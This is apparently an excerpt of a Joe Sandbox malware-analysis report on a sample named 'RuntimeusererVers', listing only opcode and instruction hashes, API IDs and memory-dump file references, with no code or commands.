                                                                                                                                                                                                                                          • Opcode ID: 2ff2ebcb5037ab26e8a38da5322c7b59402f116b98e94c0871d5cd4b7a151772
                                                                                                                                                                                                                                          • Instruction ID: b02c39109988e05c85aa851298883c749995282e977db747489f5fcd14883e9e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ff2ebcb5037ab26e8a38da5322c7b59402f116b98e94c0871d5cd4b7a151772
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35E0ED22B0998141EE545A55E941AB96360FF54BD4F1C1131FE2D4B396DE28E9A24600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                          • Opcode ID: 70593b06f9e26157b65ac3619950ba9895de117f8fb88c3c9552e3d4522fe71f
                                                                                                                                                                                                                                          • Instruction ID: d8cb0979284bafcb2a15206fced0702f4b35731d52cda01d461a6d149c05cbcb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70593b06f9e26157b65ac3619950ba9895de117f8fb88c3c9552e3d4522fe71f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9811533A28A968BD7058B2CC4006B8B3A1F7997D5F84C736EB4953381EB3CD552CB40
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 997ff8a94a22a667294433b268bb057fe07759ebb41b8671547e7ed2cd4c522e
                                                                                                                                                                                                                                          • Instruction ID: 27aed64d0bdeb99a9a0fa44b73c1427e42bba1ee77edb8e1dcd57f0d6914405b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 997ff8a94a22a667294433b268bb057fe07759ebb41b8671547e7ed2cd4c522e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC72C2B3B18A8186DB14CF15D0403AEBBA1F784BD8F109525EA8E57B98EF3CD546CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2788248766-0
                                                                                                                                                                                                                                          • Opcode ID: f2f19358fdefe772f3d941217dcd33b6ed316f586bdbc45e2d4c484ba26bcc2d
                                                                                                                                                                                                                                          • Instruction ID: a2c04fa886735a2c9cb8581ed873478990a3661941b80f01f470eb5fec4a92ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f19358fdefe772f3d941217dcd33b6ed316f586bdbc45e2d4c484ba26bcc2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADD0C212F04B8D42DE0CC7A7BE844A891525BACBD074D8039AE0D83B55C82CD4E04500
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2788248766-0
                                                                                                                                                                                                                                          • Opcode ID: 6a6d465780acf7ed9e56836580813f18a6b0f1139c5b2302c9c2a56e0bb2ae19
                                                                                                                                                                                                                                          • Instruction ID: 6b0bc8ef1e9948f10a254ba9748e7aabb8ef379ca1305c4de1698bcb3671f620
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a6d465780acf7ed9e56836580813f18a6b0f1139c5b2302c9c2a56e0bb2ae19
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDD0A715F0280242EA48B27D8D4206902D07B403E0F944034F50DC1681CC1DE9E74601
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_run_once
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1403826838-0
                                                                                                                                                                                                                                          • Opcode ID: d055155e7dfa394d9151ded48a12c15ff788ed91f46543e9f8dab3fed7f81b86
                                                                                                                                                                                                                                          • Instruction ID: 2d9a541ea31424d9810e2d06ea9e2573f93bcded251f386b8a58280b052ec19d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d055155e7dfa394d9151ded48a12c15ff788ed91f46543e9f8dab3fed7f81b86
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BD09E64F09D07D6FA48B739D8565B523A07F543A1F804235E40DC2961DD1CBD168611
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d43bf9476157c61777fd4b65358fbb4361eb85a2052333b4f96e7bbfdd0438b9
                                                                                                                                                                                                                                          • Instruction ID: 8f286a0c2c7796c09a7375757fc794c7818ddf14fec6a19d2deb9cbfbebcbc5c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d43bf9476157c61777fd4b65358fbb4361eb85a2052333b4f96e7bbfdd0438b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D42C2B3B08B8686DB24CF19E0406ADB761F784BD8F548621DB8D57B58EF38D946CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d8e4875421f020e9c42d09cee412acba05b4eeff2c6e993752fb9d1de9ee0be9
                                                                                                                                                                                                                                          • Instruction ID: e7c595b19f8238d3f7db62706dbd75f33ff31eb9399125a2ac85d831aecfdd5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8e4875421f020e9c42d09cee412acba05b4eeff2c6e993752fb9d1de9ee0be9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B42B0B3A09B85C6DB24CF29E0406AD77A1F794BD8F448622DB8D57B58EF38D542CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1676344d5858d22d07de1e68f69a31ce44255d191dc000ab06bae8175a2e3118
                                                                                                                                                                                                                                          • Instruction ID: 91e3c13c1577ea55d62299206b4b3bbe1a9d1d46824edb101a16738781b362b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1676344d5858d22d07de1e68f69a31ce44255d191dc000ab06bae8175a2e3118
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D642D2B3718A8586DB24CF1AE00076EBBA1F784BD4F449626DB8E57B94EB7CD845C700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b1c2f8d8f2df56c1e5efe58e33c67fdfbbfc5363119495fd472fcba8183a57ad
                                                                                                                                                                                                                                          • Instruction ID: dcc079ea7f61ee1e218bcde733495f4e13855ae39c7e30a0ca4f945384849793
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c2f8d8f2df56c1e5efe58e33c67fdfbbfc5363119495fd472fcba8183a57ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7502C0B3718A8587CB24CF2AE40476EBBA1F784BD4F448625EB8A57B94DB3CD441CB00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ca277f4498cd55e3dd4af1bd7aad5f69824f047e47e566ace86afdda3441772c
                                                                                                                                                                                                                                          • Instruction ID: 48b752fc9101df21331ef7308190df9233958754500df2796e7bb917d0e05a54
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca277f4498cd55e3dd4af1bd7aad5f69824f047e47e566ace86afdda3441772c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4902E2B3B18A85C6CB14CF29E4447AEBBA1F784BD4F448625EA4E47B98DB3CD445CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 29878e9dc042612fa58681e0abd1d80277afa6008cfe95e47897a9421d08fdce
                                                                                                                                                                                                                                          • Instruction ID: c96a580c0eb05b64fa741f6afc50230b4f7a95bd9df514987c886dccdf57a6be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29878e9dc042612fa58681e0abd1d80277afa6008cfe95e47897a9421d08fdce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3802D4B3B18A85C6CB14CF29E4447ADBBA1F784BD4F448625EA8E47B58DB3CD445CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2637f6f33fad8d80d15ff93327bf074b374b935a163d95dc19b9804214dbf10e
                                                                                                                                                                                                                                          • Instruction ID: d7c389dbd12b96d7a3fa8778ff3e06c6d39b16ca282fa32968a57bec53bb2b69
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2637f6f33fad8d80d15ff93327bf074b374b935a163d95dc19b9804214dbf10e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E402B0B3B18A8587CB24CF29E50475EB7A1FB84BD4F458626DB8A47B94DB3CD845CB00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3872cada07e2300e315bb93bcde8c1b4935cc2eb1d5218ac50808dd9afef2ea8
                                                                                                                                                                                                                                          • Instruction ID: 8ab604b1b9efe41a27539fa2d6319a49dbc38a156745d0f4d0c809c82fd4bef2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3872cada07e2300e315bb93bcde8c1b4935cc2eb1d5218ac50808dd9afef2ea8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F123B3B18A9483DB24CB45E450AED7765F384BC4F40962AEB8E47B58DB3DD61AC700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1e384db6e6ba6d2bd346d3fe740ed78d38d2f84f755f0f7c26ab865e24dce5ad
                                                                                                                                                                                                                                          • Instruction ID: 3de9122ee2d9320af1d824d922ace24619f0dddf25783f1d93daddda79750a58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e384db6e6ba6d2bd346d3fe740ed78d38d2f84f755f0f7c26ab865e24dce5ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E11373724A848BDB10CF29E454A59BBA5F399BD4F055229EF8E83B44EB3DD815CB00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
